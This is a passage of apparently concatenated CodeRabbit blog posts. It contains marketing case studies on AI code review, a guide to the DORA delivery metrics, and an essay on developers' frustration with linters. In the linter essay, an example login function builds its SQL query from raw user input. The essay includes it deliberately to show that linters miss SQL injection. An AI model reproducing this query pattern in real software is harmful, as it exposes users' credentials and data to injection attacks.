### **At a Glance:** **Primary contact:** David Deal, Director of Platforms **Coding languages used:** Golang, Python, Angular, TypeScript **Challenge:** Developers spend excessive time on error-prone manual code reviews. **Key Result:** Freeing up 25% of developer time, letting them build more features. [The Linux Foundation](https://training.linuxfoundation.org/?campaignid=21372675077&adgroupid=171974510868&creative=704304945812&matchtype=b&network=g&device=c&keyword=the%20linux%20foundation&hsa_acc=8666746580&hsa_cam=21372675077&hsa_grp=171974510868&hsa_ad=704304945812&hsa_src=g&hsa_tgt=kwd-300730908910&hsa_kw=the%20linux%20foundation&hsa_mt=b&hsa_net=adwords&hsa_ver=3&gad_source=1&gclid=Cj0KCQiAs5i8BhDmARIsAGE4xHzjJLJXu6A1FpiM7yWhog83EhcEZdUw3jAHO_Jx8QuC85B3t8EWh3IaAjoDEALw_wcB&utm_source=google&utm_medium=paid-search&utm_campaign=24q2-evergreen-lf_training&utm_term=tnc-na-search-lf-brand&utm_content=eg_rsa&utm_term=the%20linux%20foundation&utm_campaign=tnc-na-search-lf) is a global non-profit that supports various open-source projects that help customers build modern web applications by unlocking the power of shared technology. It hosts and supports over 200 open-source projects, including CNCF, PyTorch, OpenJS, and Automotive Grade Linux. With an engineering team of 40-60 engineers, spread globally, the organization provides a neutral space for developers and companies to collaborate. The team develops and maintains tools and services for project memberships, telemetry data management, and IT infrastructure. ## **Business Challenges - Manual Code Reviews are a Bottleneck** The Linux Foundation faced the challenge of a distributed software development team, where code reviews were slow, inefficient, and error-prone. Code reviews were done manually by technical leads and peers, with often two cycles to complete the review and the Pull Request (PR) being ready to merge. 
This manual process introduced delays especially when engineers in different time zones were waiting for feedback. They were looking for tools to identify inconsistencies and gaps in code quality without burdening team leads. ### **Key Challenges:** * Manual code reviews have high variance and are error-prone due to critical bugs being missed * Manual code reviews are limited by individual reviewer knowledge and lack the consistency needed for top-quality engineering teams * Distributed teams with engineers in different time zones lead to delayed code reviews * Gaps in code quality end up heavily burdening the team leads when they have to take time out from developing new features ## **Improving Dev Productivity with AI Code Reviews** The Linux Foundation greatly improved its software development workflow after adopting AI Code Reviews with CodeRabbit. The onboarding was quick (just a few clicks), and it took less than a day to set up, integrate with the Foundation’s GitHub repositories, and receive helpful AI code review recommendations. With CodeRabbit’s SaaS deployment model and support from the customer success team, the setup was completed very quickly. CodeRabbit’s AI code reviews freed up the engineering team lead’s time and provided a high-quality and automated first pass of the review cycle. Some examples of issues identified by AI code reviews include bug fixes, missed documentation, unit test insertion, and code refactoring suggestions. These are the key features of CodeRabbit that the Linux Foundation used: **Key Features from AI Code Reviews** **Always-on code reviews:** * CodeRabbit’s AI delivers senior engineer-level code reviews that are always available, just one click away. Unlike human reviewers, it eliminates the need for engineers to wait for peers or technical leads in different time zones, ensuring an efficient workflow. 
**PR Summaries and Suggestions:** * Concise and easy-to-understand summaries of complex changes in a PR with a walkthrough of changes in each file associated with the PR. * Line-by-line recommendations for optimizing code quality with refactoring suggestions. **1-click for bug fixes:** * Immediately identify bugs and errors before they make it to production * 1-click to accept AI suggestions on fixing bugs and automatically commit the fix to the PR. **Extensive Integrations:** * A wide array of languages and frameworks are supported including: \- Golang, Python, Angular, TypeScript, Terraform and SQL. * Out-of-the-box integrations with static analyzers and linters ensure CodeRabbit is a one-stop shop for code reviews. **Docstrings & Unit Tests:** * CodeRabbit’s AI reviews identified documentation gaps and recommended inserting unit tests, especially in SQL and DBT testing frameworks. * Recommendations for Terraform files improved infrastructure management. **Automated Learnings**: * CodeRabbit’s AI learns over time and identifies certain best practices specific to a repository. * Engineers can see and tweak the automated learnings by providing contextual feedback to the chatbot, further improving the quality of the AI code reviews. *“CodeRabbit has proven invaluable in uncovering discrepancies between our documentation and actual test coverage. Highlighting inconsistencies like missing null checks or mismatched value ranges significantly improved the quality of our codebase and prevented numerous potential issues.” —* **David Deal, Senior Director of Engineering,** [**The Linux Foundation**](https://www.linuxfoundation.org/)**.** **Conclusion** The Linux Foundation is excited to roll out CodeRabbit to additional teams in their organization. They are also looking forward to using CodeRabbit’s upcoming analytics features like tracking PR merge time and human comments reduction to more easily measure the impact of AI in speeding up their dev workflows. 
They are also excited to see how the AI learns over time as more users engage with the chatbot to reinforce learnings specific to their coding standards in their review cycle. The Linux Foundation’s adoption of CodeRabbit shows the power of AI code reviews, driving team efficiency and delivering a 25% reduction in the manual time spent on code reviews. CodeRabbit automates the boring stuff and provides actionable insights so the engineers can focus on innovation and maintaining quality in open-source projects. **Get Started with CodeRabbit** You can utilize the power of AI Code Reviews with CodeRabbit as well. It takes less than 5 minutes to get started, and no credit card is required to integrate CodeRabbit with your git platform. [Start Your Free Trial](https://app.coderabbit.ai/login?free-trial), create a new pull request, and watch AI simplify your code reviews in just a few minutes. Questions? Reach out to our team for [support](https://www.coderabbit.ai/contact-us).

Downstream impact of AI on Engineering Analytics and DORA

Aravind Putrevu — Fri, 24 Jan 2025 00:00:00 GMT

Top-performing engineering teams know the impact of hitting the right metrics, especially when it comes to speed, quality, and resilience. According to the [2024 State of DevOps report](https://cloud.google.com/resources/devops/state-of-devops), the best teams achieve lead times as low as 1 minute 29 seconds, and their incident recovery times average just 33.95 minutes.

But how many organizations can reach those benchmarks? And more importantly, what does it take?

**DORA (DevOps Research and Assessment)** metrics exist to answer these questions. They zero in on four core performance metrics: **deployment frequency**, **lead time for changes**, **mean time to restore (MTTR)**, and **change failure rate**.

The [State of DevOps report](https://cloud.google.com/resources/devops/state-of-devops) has a dedicated section on AI's impact on developer productivity. AI tools help teams build features faster through better **code reviews**, **real-time diagnostics**, **feedback cycles**, and **critical insights** into your workflows, which can positively affect your team's scores on each metric.

This guide explains the four DORA metrics and demonstrates how AI can help you improve your team’s performance on each of them.

## What Are DORA Metrics?

DORA metrics provide a quantitative method for measuring the effectiveness of your software development and deployment cycle. They try to answer the question, “What makes the best-performing software engineering teams work?”

To understand DORA metrics, it helps to understand how they started. According to *Jez Humble*, one of the co-founders of DORA, the organization was founded to help companies improve their software delivery performance through scientific measurement, benchmarking, and personalized recommendations. It started as a collaboration and eventually became an independent entity before being acquired by Google Cloud in December 2018.
After analyzing thousands of survey responses from professionals over a long period of time, the team identified four key metrics: **deployment frequency**, **lead time for changes**, **change failure rate**, and **mean time to restore**.

![DORA Metrics](https://victorious-bubble-f69a016683.media.strapiapp.com/30bf8abd79ea96d0ddd519a95741f3f85c2e0d22b744d0f386401ea1b6e8775c_1843d3c3d6.png)

These four metrics are what we know today as the DORA metrics.

## #1: The Deployment Frequency

Deployment frequency measures the number of times an organization deploys code changes to production over a specific period. This period could be a day, a week, a month, or any other interval that makes sense for your team. The metric reflects the agility of your release cycle and indicates how well your team can deliver improvements, new features, or fixes to users.

A high deployment frequency indicates a fast, efficient development process, while a low frequency can signal bottlenecks and inefficiencies in your continuous integration and delivery pipeline.

### **How to Measure Your Deployment Frequency**

Calculating deployment frequency is straightforward: divide the number of deployments by the length of the measurement period. For example, if a team deploys 20 times in a week, their deployment frequency is 20 deployments per week. The formula is:

$$Deployment\ Frequency = Number\ of\ Deployments\ /\ Time\ Period$$

The `Time Period` is the measurement interval selected by you or your team.

### **Factors Affecting Your Deployment Frequency**

Whether or not you use DevOps practices, every deployment has to go through a process or pipeline. With Continuous Integration/Continuous Deployment (CI/CD) and Infrastructure as Code (IaC), your team can automate most development and operations processes, such as running tests, deploying applications, and even provisioning infrastructure.
Additionally, approaches like the GitOps workflow allow your team to manage these processes via a Git repository. In the GitOps workflow, after you’ve committed your code to a Git repository, the CI/CD pipeline takes over and executes the rest of the process.

![An illustration of the commit to deployment pipeline](https://victorious-bubble-f69a016683.media.strapiapp.com/756c0da5dd76eb1e010af0377007b382c676524c381c6af596af786435ed0f7a_f72b7048f4.png)

However, if the pipeline is not set up properly, or if any step in the pipeline configuration has issues, it can slow down how quickly your team can push out updates. IaC configurations also usually need to be reviewed before they reach the production environment to prevent security issues, misconfiguration, and more.

### **How Can You Increase Your Deployment Frequency?**

Modern AI tools can significantly improve your deployment frequency through automated code reviews and infrastructure analysis. These tools integrate with CI/CD platforms to [review configurations](https://docs.github.com/en/actions), [detect potential issues](https://docs.coderabbit.ai/tools/actionlint/), and provide actionable insights for improvement.

![Illustration of CodeRabbit linters on configuration files on Git](https://victorious-bubble-f69a016683.media.strapiapp.com/cfc48277b87da1dec6fa1c8e6640d7526902c992a7479a535f74fa2e2c216dad_92c3a2db73.png)

For example, suppose a developer updates test cases and creates a CI pipeline to execute the tests:
```yaml
# .github/workflows/ci.yml
name: Node.js CI

on:
  push:
    branches:
      - main
      - feat/server
  pull_request:
    branches:
      - main
      - feat/server

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Set up Node.js
        uses: actions/setup-node@v3
        with:
          node-version: '16' # You can specify your desired Node.js version

      - name: Install dependencies
        run: npm install

      - name: Run tests
        run: npm test
```

This workflow runs on every push or pull request to the **main** and **feat/server** branches. It sets up **Node.js 16**, installs the dependencies, and runs the tests. Once the PR is created, AI can spot edge cases the author missed and suggest how to handle them.

![Screenshot of CodeRabbit detecting a Potential issue with the test](https://victorious-bubble-f69a016683.media.strapiapp.com/51847a83fafffd119c37a202bfb5ed616121b35fcc0de5a6afdc3bfa304ee46c_d0b755e7d7.png)

In another scenario, your complete infrastructure configuration is stored and managed on Git. Let's say your DevOps engineer creates a PR to update or provision a new resource; AI can quickly review these configuration updates and suggest improvements to secure and streamline the provisioning process.

![Screenshot of CodeRabbit suggesting security improvements](https://victorious-bubble-f69a016683.media.strapiapp.com/0cbf422dd60975658b9552a4115785e5eeb3be82896317c57488e896e1278081_a5d7546f99.png)

With automated configuration reviews and improvement suggestions, you can complete the review process in less time than with the traditional approach.

## #2: Lead Time for Changes

Lead time for changes is another essential DORA metric. It measures the time it takes from committing code to deploying it to production. Unlike deployment frequency, which counts how often you deploy, it measures the efficiency of the DevOps process. A high lead time for changes implies a slow code review or deployment process.
Lead time for changes matters because it helps project teams set realistic deadlines based on measured data. A lead time of less than a day means that you and your team can deliver new changes to your users within a day.

### **How to Calculate the Lead Time for Changes**

To calculate the lead time for a specific change, subtract the commit time from the deployment time:

$$Lead\ time\ for\ changes = time\ of\ deployment - time\ of\ code\ commit$$

For a figure that represents the team rather than a single change, take the median of these values across all changes in the period.

### **Factors Affecting lead time for changes**

One of the major factors affecting your lead time for changes is the **code review** process, the next stage of development after the code is committed. Code review is important because it helps catch bugs, security issues, and code smells, and it improves code standards.

**Pull request size** is another factor. Larger PRs take longer to review, while smaller PRs are easier and quicker to review. The longer the review takes, the longer the lead time.

### **How can you reduce your lead time for changes using AI?**

Because the code review process greatly affects lead time for changes, automating it is one of the best ways to reduce that lead time.

For instance, suppose your engineer submits a **pull request (PR)** for a new feature. Traditionally, this PR has to undergo peer review to catch bugs or code smells before it can be merged. You can augment the traditional peer-review process by letting an AI code review tool detect the PR as soon as it's submitted and begin an AI-driven review of the changes. The tool also provides real-time diagnostics and actionable suggestions, allowing you to make the necessary changes promptly.
![Screenshot of some of the actionable review comments from CodeRabbit](https://victorious-bubble-f69a016683.media.strapiapp.com/3ec71131099b8521758181e55e967f9ed75fdc361ebc8aac9c10ae227194af43_db0353bd46.png)

AI Code Review does a first pass over the PR and provides several automation benefits that can, in turn, reduce your lead time for changes.

## #3: Mean Time To Restore (MTTR)

Mean Time to Restore (MTTR) measures the average time it takes to recover from a production incident like an application failure or system outage. The MTTR metric is important for understanding how quickly your team can resolve issues that disrupt end users.

A lower MTTR indicates faster recovery from incidents, ensuring minimal disruption for users and reducing financial and reputational risks. According to the State of DevOps report, elite teams restore services within an hour, demonstrating their ability to respond quickly to unforeseen issues. Measuring and improving MTTR can help your team identify bottlenecks in its incident management processes and build resilience into its systems.

### **How Do You Calculate MTTR?**

To calculate MTTR, use the following formula:

$$MTTR = Total\ Downtime / Number\ of\ Incidents$$

For example, if your service experienced 200 minutes of downtime across five incidents in a month, your MTTR would be:

$$200 \div 5 = 40\ minutes$$

This calculation shows how long, on average, it takes your team to restore service after an issue. Tracking your MTTR over time can reveal patterns in how your team handles incidents. You can use this information to understand what’s working, identify gaps, and make adjustments to reduce downtime in the future.

### **What Factors Influence MTTR?**

Several factors affect how quickly your team can restore service after an incident. Knowing these factors helps identify ways to reduce recovery time:

* **Detection Time**: How long does it take to recognize that an incident has occurred?
* **Diagnosis Time**: Once detected, how quickly can your team locate the root cause of the problem? This often depends on clear logs, debugging tools, and collaborative troubleshooting processes.
* **Fix Time**: How fast can your team create and deploy a resolution? The time required depends on the complexity of the issue, the team’s readiness, and the deployment process.

### **How AI can help reduce MTTR**

Modern observability tools use AI to spot and fix problems faster. ML models help detect issues early by spotting unusual system behavior. When something goes wrong, AI can look through logs, metrics, and traces to find the root cause quickly.

These tools also make alerts more useful by grouping related issues together and filtering out noise. By learning from past incidents, AI can predict potential failures and suggest fixes based on what worked before. This means teams spend less time searching through logs and more time fixing actual problems.

## #4: Change Failure Rate

The **Change Failure Rate (CFR)** measures the percentage of code changes that result in production failures, such as rollbacks or hotfixes. This metric is crucial for understanding the quality and reliability of code changes. A lower CFR indicates better testing, code reviews, and overall deployment practices, while a high CFR often points to insufficient reviews or inadequate testing processes.

### **Calculating Change Failure Rate**

To calculate CFR, divide the number of failed changes by the total number of changes deployed, then multiply by 100:

$$CFR = (Number\ of\ Failed\ Changes / Total\ Changes) \times 100$$

For example, if a team deploys 50 changes and 2 of them fail, the CFR is:

$$(2 \div 50) \times 100 = 4\%$$

### Using AI and Issue Tracking to Improve Change Failure Rate

Connecting your code review tools with issue trackers like Jira gives you a clearer view of your development process. You can quickly spot bottlenecks and delays when you track code from commit to production.
By tying reviews to specific features or fixes, your team stays focused on what matters for each change.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/c1f22fbd2bd88de9748868a495e78bfe867c1b22c179fab4faee5d390950ac30_0463f1dda0.png)

This connection also helps prevent scope creep: you can easily check whether code changes match what was originally requested. When production issues occur, you can look back at similar changes to find and fix problems faster. Over time, you'll spot patterns that help prevent the same issues from happening again.

Think of it as a health check for your changes: you see what's working, what's not, and where to focus next.

## Leverage DORA Metrics to Continuously Improve Developer Productivity

Now that you understand DORA metrics and how AI tools can help, here’s what you can do next:

* **Check Your Current Metrics**: Start by measuring your team’s deployment frequency, lead time for changes, MTTR, and change failure rate. Identify where you need to improve.
* **Use AI Tools in Your Workflow**: Set up tools like CodeRabbit to automate code reviews, check your pipelines, and provide feedback on your processes. Begin by connecting it to your repositories and CI/CD systems.
* **Work With Your Team**: Share these metrics with your team and discuss ways to make changes. Use insights from automated code review tools to guide decisions.
* **Track Your Progress**: Monitor your metrics to see how your changes are working. Use reports and dashboards to identify patterns and adjust your approach.

With these steps, you can improve your development process and get better results. Understanding DORA metrics and using automated code review tools like CodeRabbit can help you make data-driven improvements that benefit your team and users. Start by measuring your current metrics, then apply what you’ve learned and track your progress.

Sign up for a [free trial of CodeRabbit](https://app.coderabbit.ai/login).
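
As a starting point for measuring your own numbers, the four formulas in this guide can be sketched in a few lines of Python. This is a minimal illustration rather than a production implementation: the function names and the sample timestamps are hypothetical, and in practice the inputs would come from your CI/CD and incident tooling. The deployment frequency, MTTR, and change failure rate values reuse the worked examples from the sections above.

```python
from datetime import datetime
from statistics import median


def deployment_frequency(deployments: int, periods: float) -> float:
    """Number of deployments divided by the number of periods (e.g. weeks)."""
    return deployments / periods


def lead_time_hours(committed_at: datetime, deployed_at: datetime) -> float:
    """Time of deployment minus time of code commit, in hours."""
    return (deployed_at - committed_at).total_seconds() / 3600


def mttr_minutes(total_downtime_minutes: float, incidents: int) -> float:
    """Total downtime divided by the number of incidents."""
    return total_downtime_minutes / incidents


def change_failure_rate(failed_changes: int, total_changes: int) -> float:
    """Failed changes as a percentage of all deployed changes."""
    return 100 * failed_changes / total_changes


# Hypothetical (commit time, deploy time) pairs for three changes.
changes = [
    (datetime(2025, 1, 6, 9, 0), datetime(2025, 1, 6, 15, 0)),   # 6 hours
    (datetime(2025, 1, 7, 10, 0), datetime(2025, 1, 8, 10, 0)),  # 24 hours
    (datetime(2025, 1, 8, 8, 0), datetime(2025, 1, 8, 10, 0)),   # 2 hours
]
lead_times = [lead_time_hours(commit, deploy) for commit, deploy in changes]

frequency = deployment_frequency(20, 1)  # 20 deployments in 1 week
median_lead = median(lead_times)         # median is less skewed by one slow change
mttr = mttr_minutes(200, 5)              # 200 minutes of downtime, 5 incidents
cfr = change_failure_rate(2, 50)         # 2 failed changes out of 50

print(f"Deployment frequency: {frequency:g} per week")
print(f"Median lead time: {median_lead:g} hours")
print(f"MTTR: {mttr:g} minutes")
print(f"Change failure rate: {cfr:g}%")
```

The median is used for lead time, as the lead time section suggests, so that a single slow change (the 24-hour one here) does not dominate the result.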

CodeRabbit's AI Code Reviews Help BuiltRight Save 25% Developer Time and Boost Efficiency

Sahil Mohan Bansal — Tue, 21 Jan 2025 00:00:00 GMT

Vertical: Technology Services

Primary Contact: William Wallace, CEO and Co-Founder

Coding Language: JavaScript

[BuiltRight](https://rebolthq.com) is an AI-powered website builder for businesses that provide home services. BuiltRight uses AI to deliver fully SEO-optimized websites and automated social media posts for their customers within minutes, with minimal effort from the end user. They leverage AI heavily in their own product and have been looking at other AI tools to optimize their internal software development process. BuiltRight has a small developer team of fewer than five people, so using AI to assist their engineers is a key part of their software development strategy. It allows them to maintain high quality with a lean and nimble team.

### **Business Challenges**

Manual code reviews can be error-prone and cumbersome, especially on a small team. BuiltRight operates in a fast-paced environment: new feature requests come in quickly, and the entire software development cycle is managed by fewer than five engineers. They needed to augment their manual code reviews with a level of automation that would free up their developers’ time to build new features and deliver value for their customers.

### **Looking for an AI Code Review Solution**

BuiltRight came across CodeRabbit through its listing on [ProductHunt](https://www.producthunt.com/products/coderabbit) while searching for new AI tools to aid software development. They were excited by the prospect of using AI to automate the first pass of the code review cycle and reduce the number of human hours spent on code review. They applied for the [CodeRabbit startup program](https://www.coderabbit.ai/startup-program) and got started with AI code reviews in less than 10 minutes!
From the first GitHub pull request it was asked to review, CodeRabbit delivered on the promise of reducing bugs in production while automating the code review process. Quick to set up, delivering immediate value, freeing up developer time: that’s the power of AI code reviews.

### **CodeRabbit Benefits**

BuiltRight implemented CodeRabbit to help their small but mighty software development team release features faster with higher-quality code. They integrated CodeRabbit’s SaaS app with their GitHub organization, and CodeRabbit enabled their team to:

* **Automate first round of code review:** AI allows BuiltRight to automate the first round of the code review process without a human engineer in the loop, freeing up crucial developer time to focus on the more complicated steps in the software development cycle.
* **25% time savings vs manual reviews:** AI code reviews helped BuiltRight save about 25% of the total time that their developers were spending on manual code reviews.
* **Reduced bugs & better code quality:** CodeRabbit caught many different types of errors, bugs, type safety issues, and copy mistakes during the code review process that could easily have been missed during manual reviews. CodeRabbit also provides contextual code-refactoring suggestions to simplify and improve overall code quality.
* **1-click fixes:** BuiltRight’s engineers leverage CodeRabbit’s integration with Linear and commit suggestions and feedback from CodeRabbit with just one click, directly from the PR where the AI code review ran.

"We found CodeRabbit through Product Hunt and gave it a try. It was super quick and easy to get started - took us less than 10 minutes.
We are looking forward to using the Learnings feature more to further improve our AI code reviews" - William Wallace, CEO of [BuiltRight](https://rebolthq.com/) ### **Next Steps:** BuiltRight is excited to explore the automated as well as user-reinforced Learnings in CodeRabbit. These learnings are essentially the AI understanding of the context behind the changes in various PRs and creating a series of learnings that are unique to each customer so that it can incorporate those in the next code review cycle. BuiltRight continues to use CodeRabbit and is looking forward to expanding its use to additional team members in the future. **Get Started with CodeRabbit** You can utilize the power of AI Code Reviews with CodeRabbit as well. It takes less than 5 minutes, and no credit card is required, to integrate CodeRabbit with your git platform. [Start Your Free Trial](https://app.coderabbit.ai/login?free-trial), create a new pull request, and watch AI simplify your code reviews in just a few minutes. Questions? Reach out to our team for [support](https://www.coderabbit.ai/contact-us).

Potpie Enhances Code Quality with AI Code Reviews

Aravind Putrevu — Fri, 17 Jan 2025 00:00:00 GMT

## At a Glance

* **Company**: Potpie
* **Industry**: AI Engineer Agents
* **Scale**: 8-10 developers
* **Challenge**: Maintaining code quality standards for a growing open-source project
* **Key Result**: Significant reduction in time spent on code reviews and code quality enforcement

## About Potpie

[Potpie](https://potpie.ai/) develops [open-source](https://github.com/potpie-ai/potpie) agentic AI automation tools that provide ready-to-use and custom-built agents for engineering tasks. Their platform helps engineering teams automate routine tasks and improve software development workflows.

## The Challenge: Managing Code Quality at Scale

As a team developing business-critical agentic AI automation tools, Potpie faced several challenges in their code review process:

### Key Pain Points

* **Review Iteration Time**: Slow code review cycles impacted development velocity
* **Quality Standards**: Inconsistent enforcement of code quality standards during reviews
* **Developer Bottlenecks**: Manual code reviews were dependent on developer availability
* **Static Analysis**: While using SonarQube, enforcement of analysis findings wasn't streamlined

## The Solution: AI Code Reviews with CodeRabbit

Potpie implemented CodeRabbit’s AI Code Reviews through a simple GitHub integration, immediately shortening their review cycle by a few days through several key features:

[![Sequence Diagram from a PR Reviewed by CodeRabbit](https://victorious-bubble-f69a016683.media.strapiapp.com/3096df9a754c2957afecc13f2cbc54219d7c4921049c0d2c9cb4140dd253a139_2439edec61.png)](https://github.com/potpie-ai/potpie/pull/213)

### Automated Code Quality Analysis

CodeRabbit provides comprehensive code analysis focusing on:

* Missing imports, particularly critical for external contributions
* Simplifying complex code changes and suggesting modularization
* Static analysis integration and enforcement of code quality standards
### Smart Prioritization of Code Reviews

The platform helps maintain review focus through:

* Distinction between nitpicks and actionable comments
* Sequence diagrams for better change visualization
* Overview of changes in all files included in the PR
* "Related PRs" feature for managing conflicting changes

### Streamlined Quality Enforcement

CodeRabbit enhances the code review process by:

* Providing instant feedback based on static analysis
* Ensuring PRs are in better shape before maintainer review
* Enforcing efficient coding practices consistently
* Maintaining existing code structure standards

## Impact and Results

The implementation of CodeRabbit has transformed Potpie's development workflow:

### Key Benefits

* **Immediate Impact**: Team saw reduced time to merge PRs from day one of implementing CodeRabbit
* **Enhanced Reviews**: More detailed and consistent code reviews
* **Maintainer Focus**: Reviewers can concentrate on bigger picture issues
* **Quality Standards**: Better enforcement of coding practices

### Process Improvements

* **Automated First Pass**: Instant feedback on common issues
* **Better PR Quality**: Changes arrive in better shape for maintainer review
* **Conflict Management**: Better tracking of related and conflicting changes
* **Developer Experience**: Enhanced but familiar workflow

## Summary

Potpie's software development team appreciates how CodeRabbit integrates into their existing workflow while providing instant, detailed feedback on code changes. By handling routine checks and enforcing coding standards automatically, CodeRabbit allows maintainers to focus on architectural decisions and bigger picture concerns.

The team actively uses CodeRabbit alongside other AI-powered tools like Cursor, Warp, and ChatGPT in their development workflow. They're particularly interested in future enhancements that would allow CodeRabbit to serve as an agentic AI reviewer that automatically performs several coding tasks with rich context.
CodeRabbit is free for Open-source projects. [Start a free trial](https://coderabbit.ai/).

Postiz Accelerates Open Source Development with AI Code Reviews

Aravind Putrevu — Fri, 10 Jan 2025 00:00:00 GMT

## **At a Glance** * **Company**: Postiz * **Industry**: Commercial Open-source * **Scale**: 1M+ users, 200+ contributors * **Challenge**: Managing code reviews across a large open-source community * **Key Result**: 80% faster review cycles ## **About Postiz** [Postiz](https://postiz.com/) is a leading self-hosted social media platform serving over a million users worldwide. With an active open-source community comprising 40 core contributors and more than 200 community contributors regularly submitting pull requests, Postiz represents the cutting edge of collaborative open-source development. ## **Challenge: Scaling Code Review in an Open Source Environment** As an [open-source project](https://github.com/gitroomhq/postiz-app) experiencing rapid growth, Postiz faced significant challenges in maintaining code quality while keeping their code review process efficient and contributor-friendly. With only two maintainers handling reviews for hundreds of contributors, the traditional manual code review process was becoming unsustainable. ### **Key Pain Points** * **Limited Maintainer Bandwidth**: Two maintainers were responsible for reviewing PRs from over 200 contributors * **Review Cycle Inefficiency**: Multiple review cycles for minor issues created "PR ping-pong," slowing down the PR merge process * **Quality Control at Scale**: Ensuring consistent code quality across contributions from developers with varying levels of expertise * **Detail Management**: Critical but minor issues were often missed during manual reviews, requiring additional revision cycles ## **Solution: AI Code Reviews by CodeRabbit** Postiz added CodeRabbit's AI Code Reviews with their 2-step GitHub integration, immediately transforming their code review process with several key features: ### **Automated First-Pass Reviews** CodeRabbit automatically performs the first-pass of the code review cycle, identifying common issues before maintainers need to get involved. 
This has been particularly valuable for: * Type definition improvements * Incorporating Refactor Suggestions * Trivial but important issues like: unused imports, naming conventions etc. ### **1-Click Suggestions** CodeRabbit's ability to immediately commit suggested changes has dramatically reduced review iteration cycles. Nevo David, Creator of Postiz, noted, “Using CodeRabbit contributors can quickly implement improvements without waiting for maintainer availability”. [![Developer working with CodeRabbit on the translation feature](https://victorious-bubble-f69a016683.media.strapiapp.com/7dc4503a153891c87379d7cbcbaf95173cf441f71650de6afb814271fb623062_5eda2025f4.png)](https://github.com/gitroomhq/postiz-app/pull/485) ### **Automated Code Quality Checks** CodeRabbit seamlessly integrates with Postiz's existing code quality setup by: * Automatically running ESLint checks based on the project's eslint.json configuration * Enforcing team-specific coding standards through existing lint rules * Converting lint violations into actionable, 1-click fix suggestions * Aggregating and prioritizing feedback from multiple automated tools in one view This automation ensures consistent code quality enforcement across all contributions while respecting the project's established standards. 
## **Impact and Results** The implementation of CodeRabbit’s AI Code Reviews has transformed development workflow at Postiz with measurable improvements: ### **Quantitative Benefits** * **Review Speed**: 80% reduction in review cycle time * **Contributor Engagement**: Increased PR merge velocity * **Quality Metrics**: Significant reduction in number of issues after PR merge ### **Qualitative Improvements** * **Enhanced Community Engagement**: Faster feedback cycles keep contributors motivated * **Improved Code Quality**: Consistent automated AI reviews catch issues that might be missed manually * **Maintainer Focus**: Team leads can focus on architectural decisions rather than catching minor issues ## **Summary** The maintainers at Postiz appreciate how CodeRabbit helps streamline their open-source code review process. With their vibrant community contributing across various areas of the TypeScript codebase - from performance optimizations to identifying potential issues and suggesting helpful refactoring improvements - CodeRabbit helps maintainers by using AI to handle initial reviews that catch common patterns. This first-pass automation allows maintainers to focus their expertise on deeper technical discussions and architectural decisions that truly benefit from human insight. The team continues to actively use CodeRabbit and is excited about upcoming features on the roadmap. They're particularly looking forward to planned improvements like code documentation, and IDE Integration. These enhancements will further streamline their open-source development process and help maintain high code quality as their community continues to grow. CodeRabbit is free for Open-source projects. If you would like to use CodeRabbit for your open-source project, you can [get started for free](https://www.coderabbit.ai/) today.

Why do developers hate linters?

Aravind Putrevu — Wed, 08 Jan 2025 00:00:00 GMT

Disclaimer: I get it; some of you out there are linters' biggest fans. But to be clear, this is my humble opinion, not a call to arms!

As a senior developer who has worked in a variety of teams, tech stacks, and organizational cultures, I’ve had my fair share of experiences with linters. A linter is a tool that programmatically checks source code for stylistic consistency, potential errors, or departures from a predetermined set of rules. This sounds like a great idea on paper: automate the nagging details of the coding style, catch issues before they become defects, and keep the codebase tidy. In practice, the relationship between developers and linters is far more complicated.

Why does this happen? After all, we’re talking about something that should, in theory, help developers write better code. To understand why some developers end up viewing linters as more of a hindrance than a help, we need to dig deeper into the cultural, psychological, and practical realities of software development. Let’s closely examine the underlying reasons for the tension, drawing on some industry sentiments and the lived experiences of engineers on the ground.

## **Warning Fatigue and False Positives**

The concept of “warning fatigue” is well-known in many fields. When people receive too many non-critical or erroneous warnings, they start ignoring them altogether. The same happens with linters. If a linter is configured too strictly, it flags a large number of issues, many of which are superficial and don’t represent real bugs. Over time, developers start to tune out these warnings. Eventually, meaningful alerts get lost in the noise.

A false positive occurs when the linter incorrectly flags a code snippet or a pattern that is actually fine. With each false positive, a developer grows more convinced that the tool is poorly configured or simply not useful.
```json
{
  "rules": {
    // Overwhelming style rules
    "quotes": ["error", "single"],
    "semi": ["error", "always"],
    "indent": ["error", 2],
    "comma-dangle": ["error", "always-multiline"],
    "arrow-parens": ["error", "always"],
    "max-len": ["error", { "code": 80 }],

    // Actually important rules buried in noise
    // (the "security/" rule requires eslint-plugin-security)
    "no-eval": "error",
    "no-implied-eval": "error",
    "security/detect-object-injection": "error",

    // False positive generators
    // (the "@typescript-eslint/" rule requires the typescript-eslint plugin)
    "no-unused-vars": "error",
    "no-unreachable": "error",
    "no-unsafe-optional-chaining": "error",
    "@typescript-eslint/no-unused-vars": "error"
  }
}
```

Frankly, false positives and noise from linters are the least of the troubles; linters can cause team friction by creating a style debate.

## **New Sources of Style Debates (Bikeshedding)**

One of the often-touted benefits of linters is that they supposedly end debates about code style. In reality, they can just shift the debate from “What style do we use?” to “Which rules do we enable or disable?” Teams can spend enormous amounts of time arguing over style guide configurations. Should we use trailing commas or not? Should we enforce camelCase, snake\_case, or PascalCase for certain identifiers? Should lines be limited to 80 characters, 100, or 120?
Here's a typical scene in many development teams. A developer submits a critical authentication function for review:

```python
def authenticate_user(user_data):
    username = user_data['username']  # Linter: line too long (81 chars)
    password = user_data['password']  # Linter: prefer single quotes
    if username and password:  # Linter: missing whitespace
        result= query_db(  # Linter: missing space around operator
            f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
        )  # Linter: trailing whitespace
        return result
    return None  # Linter: inconsistent return statements
```

Every comment in that review is about formatting. None of them mentions that the query is built by interpolating user input into a SQL string, which leaves the function open to SQL injection.

This can lead to what is known as “bikeshedding”: the phenomenon where groups spend disproportionate time discussing trivial details instead of focusing on more significant issues. Instead of eliminating debates, linters often just turn them into religious wars over rule sets. And once a certain style guide is chosen (often an off-the-shelf configuration like the Airbnb Style Guide), there can be pushback when team members try to tweak it. The environment can become rigid and dogmatic, further souring developers’ relationships with the tool.

## **Inflexible Rules and Contextual Nuance**

A key limitation of linters is their inability to understand context. Code often has nuances that escape simplistic rule-based tools. For example, a particular code structure might violate a stylistic rule but make perfect sense in a specific scenario; perhaps it handles an edge case elegantly. The linter, however, doesn’t care about this context. It just sees a rule violation.
Consider this matrix operation, where readability improves when the rows are vertically aligned:

```python
def transform_matrix(matrix):
    return [
